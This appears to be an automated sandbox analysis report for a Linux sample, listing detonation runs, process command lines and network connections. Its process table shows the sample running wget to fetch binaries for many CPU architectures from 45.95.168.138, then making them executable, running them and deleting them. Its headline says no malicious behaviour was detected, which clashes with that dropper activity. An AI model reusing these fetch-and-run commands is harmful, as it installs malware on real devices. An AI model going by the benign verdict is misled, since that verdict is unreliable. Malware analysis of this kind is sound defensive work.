Analysis Overview
SHA256
f7e374f479296d08a98d549c93433ec13ddeaf6835ea9d76d0bf33c23ff24682
Threat Level: No (potentially) malicious behavior was detected
The file 15917961bac6063481040fcc4af85061_JaffaCakes118 was found to be: No (potentially) malicious behavior was detected.
Malicious Activity Summary
MITRE ATT&CK
Analysis: static1
Detonation Overview
Reported
2024-05-05 02:27
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-05 02:27
Reported
2024-05-05 03:02
Platform
debian9-mipsbe-20240418-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-05-05 02:27
Reported
2024-05-05 03:03
Platform
debian9-mipsel-20240226-en
Command Line
Signatures
Processes
Network
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-05-05 02:27
Reported
2024-05-05 03:05
Platform
ubuntu1804-amd64-20240418-en
Max time kernel
36s
Max time network
129s
Command Line
Signatures
Processes
| Process | Command Line |
|---|---|
| /tmp/15917961bac6063481040fcc4af85061_JaffaCakes118 | /tmp/15917961bac6063481040fcc4af85061_JaffaCakes118 |
| /usr/bin/wget | wget http://45.95.168.138/mips |
| /bin/chmod | chmod +x mips |
| /tmp/mips | ./mips |
| /bin/rm | rm -rf mips |
| /usr/bin/wget | wget http://45.95.168.138/mipsel |
| /bin/chmod | chmod +x mipsel |
| /tmp/mipsel | ./mipsel |
| /bin/rm | rm -rf mipsel |
| /usr/bin/wget | wget http://45.95.168.138/sh4 |
| /bin/chmod | chmod +x sh4 |
| /tmp/sh4 | ./sh4 |
| /bin/rm | rm -rf sh4 |
| /usr/bin/wget | wget http://45.95.168.138/x86 |
| /bin/chmod | chmod +x x86 |
| /tmp/x86 | ./x86 |
| /bin/rm | rm -rf x86 |
| /usr/bin/wget | wget http://45.95.168.138/armv6l |
| /bin/chmod | chmod +x armv6l |
| /tmp/armv6l | ./armv6l |
| /bin/rm | rm -rf armv6l |
| /usr/bin/wget | wget http://45.95.168.138/i686 |
| /bin/chmod | chmod +x i686 |
| /tmp/i686 | ./i686 |
| /bin/rm | rm -rf i686 |
| /usr/bin/wget | wget http://45.95.168.138/powerpc |
| /bin/chmod | chmod +x powerpc |
| /tmp/powerpc | ./powerpc |
| /bin/rm | rm -rf powerpc |
| /usr/bin/wget | wget http://45.95.168.138/i586 |
| /bin/chmod | chmod +x i586 |
| /tmp/i586 | ./i586 |
| /bin/rm | rm -rf i586 |
| /usr/bin/wget | wget http://45.95.168.138/m68k |
| /bin/chmod | chmod +x m68k |
| /tmp/m68k | ./m68k |
| /bin/rm | rm -rf m68k |
| /usr/bin/wget | wget http://45.95.168.138/sparc |
| /bin/chmod | chmod +x sparc |
| /tmp/sparc | ./sparc |
| /bin/rm | rm -rf sparc |
| /usr/bin/wget | wget http://45.95.168.138/armv4l |
| /bin/chmod | chmod +x armv4l |
| /tmp/armv4l | ./armv4l |
| /bin/rm | rm -rf armv4l |
| /usr/bin/wget | wget http://45.95.168.138/armv5l |
| /bin/chmod | chmod +x armv5l |
| /tmp/armv5l | ./armv5l |
| /bin/rm | rm -rf armv5l |
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| US | 151.101.194.49:443 | | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.129.91:443 | | tcp |
| US | 151.101.129.91:443 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| GB | 195.181.164.19:443 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
Files
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-05 02:27
Reported
2024-05-05 03:05
Platform
debian9-armhf-20240418-en
Max time network
38s
Command Line
Signatures
Processes
Network
| Country | Destination | Domain | Proto |
|---|---|---|---|
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |
| HR | 45.95.168.138:80 | | tcp |